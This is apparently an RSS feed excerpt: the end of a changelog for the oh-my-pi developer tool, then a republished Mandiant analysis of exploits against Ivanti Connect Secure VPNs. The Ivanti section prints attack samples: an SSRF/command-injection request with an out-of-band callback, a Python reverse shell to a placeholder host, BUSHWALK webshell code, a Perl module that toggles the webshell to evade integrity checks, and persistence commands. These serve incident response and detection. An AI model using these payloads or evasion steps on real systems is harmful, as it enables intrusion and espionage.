<p>Fixed <code>debug</code> tool refusing every <code>dlv</code> launch on Go modules. The launch handler ran <code>validateLaunchProgram</code> before adapter selection and rejected any directory program with <code>launch program resolves to a directory</code>, while dlv's default <code>mode=debug</code> requires a Go package path (a directory or <code>.go</code> source file). Adapter resolution now precedes validation, directory programs prefer adapters that advertise <code>acceptsDirectoryProgram</code> before falling back to native extensionless debuggers, the rejection only fires when the resolved adapter does not advertise that flag (set on <code>dlv</code> in <code>dap/defaults.json</code>), and dlv's <code>mode</code> is derived from the program shape — directories and <code>.go</code> files launch as <code>mode=debug</code>, other files as <code>mode=exec</code> — so <code>omp</code> can debug both Go packages and pre-built binaries (<a href="https://github.com/can1357/oh-my-pi/issues/2020" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2020/hovercard">#2020</a>).</p>
</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>applyBashFixups</code> corrupting commands that contain multi-byte UTF-8 before a trailing <code>| head</code>/<code>| tail</code> (or <code>2&gt;&amp;1</code>). <code>brush-parser</code> reports source positions as Unicode-scalar (char) offsets, but <code>pi_shell::fixup</code> sliced the command <code>&amp;str</code> by those numbers as if they were byte offsets, so each multi-byte char (e.g. <code>✓</code>/<code>×</code> in a <code>grep -E</code> pattern) shifted the cut earlier and left a mangled command — e.g. <code>… |✓|×|XCTAssert" | tail -80</code> became <code>… |✓|×-80</code>, orphaning the closing quote and making the shell reject the whole pipeline with <code>unterminated double quote</code>. Positions are now translated to byte offsets before slicing.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed Kitty temp-file image transmission, its startup support probe, the <code>PI_KITTY_IMAGE_TRANSMISSION</code> override, and the temp-file helper exports. Kitty/Ghostty image payloads now stay on in-band base64 before placeholder/direct placement, avoiding blank first renders from temp-file load races.</li>
<li>Renamed <code>RenderRequestOptions.allowUnknownViewportMutation</code> → <code>allowUnknownViewportTransientRepaint</code>. The option only permits a transient live-viewport repaint (autocomplete/IME/focused-editor chrome) on hosts that cannot report viewport position; it never authorizes a settled transcript commit. The old name implied any offscreen mutation was safe to push into native scrollback, which led callers to emit duplicate transcript copies.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>TUI.addStartListener()</code> so feature hooks can re-enable terminal modes after temporary stop/start cycles such as external-editor handoffs.</li>
<li>Added <code>Editor.pasteText()</code> to apply terminal-style paste handling for text inserted from non-bracketed paste transports</li>
<li>Added an optional <code>dispose()</code> lifecycle method to <code>Component</code> so components can release timers and subscriptions during permanent teardown</li>
<li>Added <code>Container.dispose()</code> to propagate teardown to child components when a component tree is permanently discarded</li>
<li>Added <code>Loader.dispose()</code> to stop the loader animation timer when the component is disposed</li>
<li>Added a <code>ScrollView</code> <code>ellipsis</code> option (defaults to <code>Ellipsis.Unicode</code>) so callers that pre-wrap content to width can pass <code>Ellipsis.Omit</code> and suppress the stray per-line <code>…</code> that lands on trailing padding.</li>
<li>Added <code>ScrollView.handleScrollKey()</code> plus a <code>fastScrollLines</code> option so every scroll view gets shared navigation keys, including Shift+Arrow to scroll faster.</li>
<li>Added <code>OverlayOptions.fullscreen</code>: while the topmost visible overlay sets it, the engine borrows the terminal's alternate screen buffer for the overlay's lifetime and paints only the modal there — no ED3, no transcript re-commit — so the transcript stays untouched on the normal screen and is not scrollable behind the modal. Mouse tracking (<code>?1000h</code>/<code>?1006h</code>) is enabled for the modal's lifetime and disabled on exit, so the rest of the app keeps the terminal's native text selection.</li>
<li>Added the <code>submitPinsViewportToTail</code> terminal capability and <code>detectSubmitPinsViewportToTail()</code>: genuine local terminals where a submit keystroke scrolls the host to its tail reconcile deferred native scrollback at the prompt-submit checkpoint even when the viewport position is unprobeable (Ghostty/kitty/iTerm/WezTerm/Alacritty). Restores the pre-regression submit reconciliation without re-enabling it for Windows Terminal/ConPTY, SSH, or multiplexers, where a submit is not proof the host is at the tail.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed static <code>Loader</code> messages to repaint only at the spinner's 80 ms cadence; time-dependent message colorizers can opt into 16 ms redraws with <code>animated: true</code>.</li>
<li>Changed keybinding matching to precompute canonical key sets so each input sequence is parsed once per binding check instead of once per candidate key.</li>
<li>Made <code>Component.invalidate()</code> optional so leaf components without render caches no longer need no-op invalidation hooks.</li>
<li><code>TERMINAL</code> is now a <code>RuntimeTerminal</code> whose post-construction capabilities (image protocol and the probe-driven flags) are writable, replacing the <code>as unknown as MutableTerminalInfo</code> cast pattern and the positional <code>withTerminalOverrides</code> rebuild with a prototype-preserving <code>clone()</code>.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed <code>Loader</code> text updates to skip identical messages and preserve the rendered <code>Text</code> cache instead of invalidating it every timer tick.</p>
</li>
<li>
<p>Fixed fullscreen overlay alt-frame rendering to reuse the current line-preparation path instead of calling removed fitting helpers.</p>
</li>
<li>
<p>Reduced TUI render-path line fitting by deferring overlay base-frame fitting until an overlay rebuild and by reusing already-fitted lines in emitters.</p>
</li>
<li>
<p>Reduced live-region pinned repaint output by diffing unchanged viewport rows when no sealed rows are being committed to native scrollback.</p>
</li>
<li>
<p>Fixed no-append live-region pinned repaints to re-anchor the hardware cursor when the logical viewport shifts.</p>
</li>
<li>
<p>Fixed keybinding matching so printable uppercase input preserves <code>Shift</code> for bindings such as <code>shift+a</code>.</p>
</li>
<li>
<p>Optimized terminal image-line detection and Thai/Lao AM normalization checks to avoid hot-path regex scans and substring allocations.</p>
</li>
<li>
<p>Fixed <code>Markdown.render()</code> cache hits returning the cache's mutable backing array, which let callers that append extra rows corrupt cached Markdown and duplicate those rows on every redraw.</p>
</li>
<li>
<p>Fixed first-paint full replays for callers that intentionally replace terminal history by allowing <code>TUI.start({ clearScrollback: true })</code>, so they do not briefly append an entire initial frame before the first clean replay.</p>
</li>
<li>
<p>Fixed ED3-risk streaming cap accounting to preserve the native scrollback high-water mark for rows that were already physically committed before transient frames were viewport-capped.</p>
</li>
<li>
<p>Fixed terminal stop and restore cleanup to disable enhanced paste mode so it does not remain enabled after shutdown</p>
</li>
<li>
<p>Removed the per-frame line-fit <code>Map</code> cache from the render timer path to avoid forcing JSC rope-string hashing during scheduled viewport repaints.</p>
</li>
<li>
<p>Fixed <code>visibleWidth()</code> so terminal column measurements for ANSI and OSC text now match the native truncation/wrapping helpers, including OSC 66 text-sizing spans being counted at their scaled payload width</p>
</li>
<li>
<p>Fixed cursor, padding, and line-fit behavior when strings contain tabs or OSC escapes by aligning <code>visibleWidth()</code> with the native text-width model</p>
</li>
<li>
<p>Fixed the transcript — or a re-appearing prior view such as the welcome screen — duplicating itself on terminals without a scroll-position oracle (Ghostty/kitty/iTerm/WezTerm) when a foreground tool completes by rewriting a partly-committed block, or when the transcript is reset. A non-destructive viewport repaint no longer re-paints rows that are byte-identical to what is already committed to native scrollback into the active grid; the repaint anchor is clamped to the committed-and-unchanged prefix (<code>min(firstChanged, scrollbackHighWater)</code>).</p>
</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(ai): route llama.cpp parallel tool calls by <code>item.call_id</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4605305722" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2016" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2016/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2016">#2016</a></li>
<li>fix(debug): accept directory programs for dlv and auto-select dlv mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4605979296" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2021" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2021/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2021">#2021</a></li>
<li>fix(ai): coerce singleton array arguments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4606419503" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2027" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2027/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2027">#2027</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.10.0...v15.10.1"><tt>v15.10.0...v15.10.1</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts]]></title>
<description><![CDATA[Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer

 
Mandiant and Ivanti's investigations into widespread Ivanti zero-day exploitation have continued across a variety of industry verticals, including the U.S. defense industrial base s...]]></description>
<link>https://tsecurity.de/de/3578877/it-security-nachrichten/cutting-edge-part-3-investigating-ivanti-connect-secure-vpn-exploitation-and-persistence-attempts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578877/it-security-nachrichten/cutting-edge-part-3-investigating-ivanti-connect-secure-vpn-exploitation-and-persistence-attempts/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>Mandiant and Ivanti's investigations into widespread <a href="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-targets-ivanti-zero-day" rel="noopener" target="_blank"><u>Ivanti zero-day exploitation</u></a> have continued across a variety of industry verticals, including the U.S. defense industrial base sector. Following the initial publication on Jan. 10, 2024, Mandiant observed mass attempts to exploit these vulnerabilities by a small number of China-nexus threat actors, and development of a mitigation bypass exploit targeting <a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-21893</u></a> used by <u>UNC5325</u>, which we introduced in our <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>"Cutting Edge, Part 2" blog post</u></a>. </p>
<p>Notably, Mandiant has identified UNC5325 using a combination of living-off-the-land (LotL) techniques to better evade detection, while deploying novel malware such as LITTLELAMB.WOOLTEA in an attempt to persist across system upgrades, patches, and factory resets. While the limited attempts observed to maintain persistence have not been successful to date due to a lack of logic in the malware's code to account for an encryption key mismatch, it further demonstrates the lengths UNC5325 will go to maintain access to priority targets and highlights the importance of ensuring network appliances have the latest updates and patches.</p>
<p>Ivanti customers are urged to take immediate action to ensure protection if they haven't done so already. A new version of the external Integrity Checking Tool (ICT), which helps detect these persistence attempts, is now available. See Ivanti's <a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><u>security advisory</u></a> and refer to our updated <a href="https://services.google.com/fh/files/misc/ivanti-connect-secure-remediation-hardening.pdf" rel="noopener" target="_blank"><u>remediation and hardening guide</u></a>, which includes the latest recommendations.</p>
<p>The exploitation of the Ivanti zero-days has likely impacted numerous appliances. While much of the activity has been automated, there has been a smaller subset of follow-on activity providing further insights on attacker tactics, techniques, and procedures (TTPs). Mandiant assesses additional actors will likely begin to leverage these vulnerabilities to enable their operations.</p>
<p>To date, Ivanti has disclosed the following five vulnerabilities affecting Ivanti Connect Secure and other products.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>CVE</strong></p>
</td>
<td>
<p><strong>CVSS</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 10, 2024</span></p>
</td>
<td>
<p><span>CVE-2023-46805</span></p>
</td>
<td>
<p><span>8.2</span></p>
</td>
<td>
<p><span>Authentication bypass vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 10, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21887</span></p>
</td>
<td>
<p><span>9.1</span></p>
</td>
<td>
<p><span>Command injection vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 31, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21888</span></p>
</td>
<td>
<p><span>8.8</span></p>
</td>
<td>
<p><span>Privilege escalation vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 31, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21893</span></p>
</td>
<td>
<p><span>8.2</span></p>
</td>
<td>
<p><span>SSRF vulnerability in the SAML component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Feb. 08, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-22024</span></p>
</td>
<td>
<p><span>8.3</span></p>
</td>
<td>
<p><span>XXE vulnerability in the SAML component</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em>Table 1: Ivanti vulnerability disclosures Jan. 10, 2024 to Feb. 8, 2024</em></span></p>
<p>In our <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>previous blog post</u></a>, we described a mitigation bypass that was used to drop a newly identified BUSHWALK webshell. The mitigation bypass is now tracked as <a href="https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-21893</u></a>. It is a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure (CS), Policy Secure (PS), and Neurons for Zero Trust Access (NZTA) appliances that was addressed in the patches and mitigations released on Jan. 31, 2024. </p>
<p>Since that post, an additional vulnerability was reported on Feb. 8, 2024, by Ivanti, <a href="https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-22024</u></a>, related to an XML External Entity (XXE) vulnerability in the SAML component that allows unauthenticated attackers to gain access to restricted resources on patched appliances.</p>
<h2>Attribution</h2>
<h3>UNC5325</h3>
<p>UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.</p>
<h3>UNC3886</h3>
<p>UNC3886 is a suspected Chinese espionage operator that has compromised network devices at targets where they <a href="https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass" rel="noopener" target="_blank"><u>leveraged novel techniques</u></a> against virtualization technologies. They installed custom malware built for such technologies by leveraging code from open-source projects as well as exploiting zero-day vulnerabilities. UNC3886 has primarily targeted the defense industrial base, technology, and telecommunication organizations located in the US and APJ regions. We are continuing to gather evidence and identify overlaps between UNC3886 and other suspected Chinese espionage groups, including targeting and the use of distinct tactics, techniques, and procedures (TTPs). </p>
<h2>New TTPs and Malware</h2>
<p>Since our last <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>blog post</u></a> on Ivanti exploitation, Mandiant has identified UNC5325 exploiting CVE-2024-21893 (SSRF) to deploy additional malware and maintain persistent access to compromised appliances. In addition, we have observed new TTPs that attempted to enable the custom backdoors to persist across factory resets, system upgrades, and patches. The limited attempts observed to maintain persistence have not been successful to date.</p>
<h3>Exploitation of CVE-2024-21893 (SSRF)</h3>
<p>Mandiant identified active exploitation of CVE-2024-21893 by UNC5325 as early as Jan. 19, 2024, targeting a limited number of Ivanti Connect Secure appliances.</p>
<p>On Jan. 31, 2024, Ivanti disclosed CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA. To date, we have only identified successful exploitation against Ivanti Connect Secure appliances.</p>
<p>In the same Jan. 31, 2024, announcement, Ivanti released a new XML mitigation to prevent exploitation of all four (4) disclosed CVEs at the time of the announcement. This included:</p>
<ul>
<li>CVE-2023-46805 (authentication bypass)</li>
<li>CVE-2024-21887 (command injection)</li>
<li>CVE-2024-21888 (privilege escalation)</li>
<li>CVE-2024-21893 (server-side request forgery)</li>
</ul>
<p>CVE-2024-21893 allowed for an unauthenticated attacker to exploit an appliance by chaining the previously disclosed command injection vulnerability as described in CVE-2024-21887. This includes appliances with the XML mitigation released on Jan. 10, 2024.</p>
<h5>Chaining CVE-2024-21893 (SSRF) and CVE-2024-21887 (Command Injection)</h5>
<p>Shortly after the disclosure of CVE-2024-21893, Mandiant observed threat actors chaining the SSRF vulnerability with the command injection vulnerabilities described in CVE-2024-21887 to exploit vulnerable devices.</p>
<p>In some instances, publicly available services, such as <a href="https://github.com/projectdiscovery/interactsh" rel="noopener" target="_blank"><u>Interactsh</u></a>, were used to validate whether the target was vulnerable to CVE-2024-21893.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>GET /api/v1/license/keys-status/;python -c 'import 
socket;socket.gethostbyname("&lt;randomstring&gt;.oast.live")'</code></pre>
<p><span><em><span>Figure 1: CVE-2024-21893 vulnerability validation</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Shortly after a vulnerable target was identified, the threat actor executed follow-on commands to perform reconnaissance and, in some cases, establish a reverse shell.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>GET /api/v1/license/keys-status/;python -c 'import 
socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
;s.connect(("&lt;remote_ip&gt;",&lt;port&gt;));subprocess.call(["/bin/sh","-i"]</code></pre>
<p><span><em><span>Figure 2: Python reverse TCP shell</span></em></span></p></div>
<div class="block-paragraph_advanced"><h4>Identifying Exploitation Attempts</h4>
<p>Exploitation of the SSRF vulnerability in the SAML component generates up to two (2) log events and some host-based artifacts on an affected appliance.</p>
<p>If the Ivanti Connect Secure appliance is configured to log unauthenticated requests, event ID <code>AUT31556</code> is generated when an unauthenticated attacker requests the vulnerable SAML endpoint, <code>/dana-ws/saml.ws</code>. The event includes the source IP address of the unauthenticated request.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>AUT31556: Unauthenticated request url /dana-ws/saml.ws came from IP 
&lt;REDACTED&gt;.</code></pre>
<p><span><em><span>Figure 3: Event log entry showing unauthenticated request to vulnerable SAML endpoint</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>In addition, the server fails to gracefully handle the maliciously crafted SAML payload to exploit CVE-2024-21893. The appliance generates an error event log entry with event ID <code>ERR31903</code> when the <code>saml-server</code> process crashes, which is potentially indicative of an exploitation attempt.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>ERR31093: Program saml-server recently failed.</code></pre>
<p><span><em><span>Figure 4: Event log entry of process crash</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>We recommend analyzing both allocated and unallocated disk space on the forensic image for the presence of the log events as we have observed the threat actor deleting the relevant log files.</p>
<p>Lastly, the crash of the <code>saml-server</code> process generates core dumps located in <code>/data/var/cores/</code>. If the core dumps are available, it is possible to extract the crafted SAML message, HTTP headers of the request, and the source IP address. We have observed the threat actor deleting the contents of the <code>cores</code> directory, but we have successfully recovered relevant fragments of the core dumps through file carving.</p>
<h3>BUSHWALK Variant</h3>
<p>In <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>Cutting Edge, Part 2</u></a>, we introduced a new web shell tracked as BUSHWALK associated with the exploitation of CVE-2024-21893 and CVE-2024-21887. Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and embedded into a legitimate Ivanti Connect Secure component, <code>querymanifest.cgi</code>.</p>
<p>Mandiant identified a new variant of BUSHWALK through our incident response engagements. This new variant of BUSHWALK was identified on a compromised appliance less than twelve (12) hours following Ivanti's disclosure of CVE-2024-21893 on Jan. 31, 2024. The variant is similar to the BUSHWALK sample described in our previous blog post, but with a new function named <code>checkVerison</code> that enables arbitrary file read from the appliance. The function is executed when the decrypted payload contains the string check. Figure 5 shows the relevant <code>checkVerison</code> function.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>sub checkVerison
{
    my ($file, $key) = @_;
    my $contents = "";
    my $buffer;
    my $bytesread = 0;
    my $totalbytesread = 0;
    local *FILE;
    CORE::open(*FILE, $file);
    while($bytesread = sysread(FILE, $buffer, 1024)) {
        $contents .= $buffer;
        $totalbytesread += $bytesread;
    }
    if ($totalbytesread == 0) {
        print "Unable to read file with path: $file";
        print CGI::header(-type=&gt;"text/html", -status=&gt; '404 Not Found');
        exit;
    }
    print CGI::header();
    $contents = RC4($key, $contents);
    $contents = MIME::Base64::encode_base64($contents);
    print $contents;
    close *FILE;
}</code></pre>
<p><span><em><span>Figure 5: BUSHWALK's </span><code>checkVerison</code><span> function for file reading</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Note that we have observed the same RC4 key for decrypting issued commands across the two BUSHWALK variants and all identified samples.</p>
<p>In addition, we have seen the threat actor demonstrate a nuanced understanding of the appliance and their ability to subvert detection throughout this campaign. We identified a technique allowing BUSHWALK to remain in an undetected dormant state by creatively modifying a Perl module and LotL technique by using built-in system utilities unique to Ivanti products.</p>
<p>To accomplish this, the threat actor first modifies a Perl module, <code>DSUserAgentCap.pm</code>, that evaluates incoming user agents. The modification enables the threat actor to either activate or deactivate BUSHWALK depending on the incoming HTTP request's user agent.</p>
<p>Figure 6 provides the excerpt of the modification in <code>DSUserAgentCap.pm</code>. Note the difference in spelling between <code>App1eWebKit</code> and <code>AppIeWebKit</code> in the two user agent strings.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>sub getUserAgentType {
   my ($user_agent) = @_;
   if ($user_agent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
App1eWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"){
        system("mount -o remount,rw /");
        system("/home/bin/configdecrypt /data/runtime
/cockpit/diskAnalysis /data/runtime/cockpit/diskAnalysis.bak");
        system("cp /home/webserver/htdocs/dana-na/jam/querymanifest.cgi 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi.bak");
        system("echo '/home/webserver/htdocs/dana-na/jam
/querymanifest.cgi' &gt;&gt; /home/etc/manifest/exclusion_list");
        system("mv /data/runtime/cockpit/diskAnalysis.bak 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("chmod 755 /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi");
        system("mkdir /debug");
        system("/home/bin/restartServer.pl Restart");
        exit(0);
   }
   elsif ($user_agent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppIeWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"){
        system("mv /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi.bak /home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("touch -r /home/webserver/htdocs/dana-na/auth
/setcookie.cgi /home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("/bin/sed -i '\$d' /home/etc/manifest/exclusion_list");
        system("rm -rf /debug");
        system("mount -o remount,ro /");
        exit(0);
   }
   else{
        my $type  = DSClientTypes::getUserAgentType($user_agent);
        return $type;
   }</code></pre>
<p><span><em><span>Figure 6: Excerpt of DSUserAgentCap.pm</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>An encrypted version of BUSHWALK is placed in a directory excluded by the integrity checker tool (ICT) in <code>/data/runtime/cockpit/diskAnalysis</code>. </p>
<p>The activation routine (the <code>if</code> block) uses a built-in utility on the appliance located in <code>/home/bin/configdecrypt</code> used for decrypting the system's configuration. The routine executes the <code>configdecrypt</code> utility to decrypt <code>diskAnalysis</code> containing the BUSHWALK web shell. It then makes a backup of the original <code>querymanifest.cgi</code> file, adds it to the <code>exclusion_list</code>, moves BUSHWALK to the web server directory, and restarts the web server to load the web shell.</p>
<p>The deactivation routine (the <code>elseif</code> block) restores the original <code>querymanifest.cgi</code> file, timestomps it using <code>touch</code> to hide their activity, removes the path of BUSHWALK from <code>exclusion_list</code>, and restarts the web server. However, the encrypted version of BUSHWALK remains dormant in a dynamic directory and therefore is not scanned by the integrity checker tool. It continues to quietly persist in <code>/data/runtime/cockpit/diskAnalysis</code> until the threat actor activates it again.</p>
<p>The internal ICT is configured to run in two-hour intervals by default and is meant to be run in conjunction with continuous monitoring. Any malicious file system modifications made and reverted between the two-hour scan intervals would remain undetected by the ICT. When the activation and deactivation routines are performed tactfully in quick succession, it can minimize the risk of ICT detection by timing the activation routine to coincide precisely with the intended use of the BUSHWALK webshell.</p>
<h3>SparkGateway Plugin Abuse</h3>
<p>In a limited number of instances following exploitation of CVE-2024-21893, we identified the use of SparkGateway plugins to persistently inject shared objects and deploy backdoors. SparkGateway is a legitimate component of the Ivanti Connect Secure appliance that enables remote access protocols over a browser, such as RDP or SSH. The functionality of SparkGateway can be extended through plugins.</p>
<h4>PITFUEL Plugin</h4>
<p>Mandiant identified a SparkGateway plugin named <code>plugin.jar</code> (PITFUEL) that loads the shared object <code>libchilkat.so</code> (LITTLELAMB.WOOLTEA) through the Java Native Interface (JNI) by calling <code>System.load()</code>. The shared object persistently deploys backdoors and contains capabilities to persist across system upgrade events, patches, and factory resets.</p>
<p>Figure 7 shows the relevant excerpt of the <code>PluginManager</code> class in PITFUEL.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>public class PluginManager {
  static {
    try {
      System.load("/home/runtime/SparkGateway/libchilkat.so");
    } catch (Exception exception) {}
    try {
      Config config = Config.getInstance();
      config.remove("plugin");
      config.remove("pluginFile");
    } catch (Exception exception) {}
    try {
      Logger logger = Logger.getLogger(Config.class.getName());
      SparkGatewayFilter sparkGatewayFilter = new SparkGatewayFilter();
      logger.setFilter(sparkGatewayFilter);
    } catch (Exception exception) {}
  }
  
  static class SparkGatewayFilter implements Filter {
    public boolean isLoggable(LogRecord param1LogRecord) {
      return (param1LogRecord.getLevel().intValue() != Level.
SEVERE.intValue());
    }
  }
}
</code></pre>
<p><span><em><span>Figure 7: </span><code>PluginManager</code><span> class of SparkGateway plugin (PITFUEL)</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Upon execution, <code>libchilkat.so</code> (LITTLELAMB.WOOLTEA) performs a number of initialization routines to ensure that it persistently runs in the background on the compromised system. It accomplishes this by daemonizing itself, attempting to trap <code>SIGPIPE</code>, <code>SIGKILL</code>, and <code>SIGTERM</code> signals, and adjusting the out of memory (OOM) adjustment value (<code>oom_adj</code>) to <code>-17</code> to keep the process running even when the system is out of memory.</p>
<h4>Persistence Across System Upgrades and Patches</h4>
<p>Upon first execution, LITTLELAMB.WOOLTEA executes the <code>first_run()</code> function. It calls the <code>edit_current_data_backup()</code> function that appends its malicious components to an archive, <code>/data/pkg/data-backup.tgz</code>. Figure 8 provides the equivalent command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>gzip -d /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1

tar -rf /data/pkg/data-backup.tar /data/runtime/SparkGateway/plugin.jar 
/data/runtime/SparkGateway/libchilkat.so 
/data/runtime/SparkGateway/gateway.conf &gt; /dev/null 2&gt;&amp;1

gzip /data/pkg/data-backup.tar &gt; /dev/null 2&gt;&amp;1

mv /data/pkg/data-backup.tar.gz /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 8: Command sequence executed by </span><code>edit_current_data_backup()</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>During a system upgrade or when applying a patch, <code>data-backup.tgz</code> contains a backup of the <code>data</code> directory that is restored after the upgrade event. In addition, the function timestomps <code>data-backup.tgz</code> by calling <code>utimensat</code>. This modification would ensure its malicious components (<code>plugin.jar</code>, <code>libchilkat.so</code>, and <code>gateway.conf</code>) persist across system upgrades and patches.</p></div>
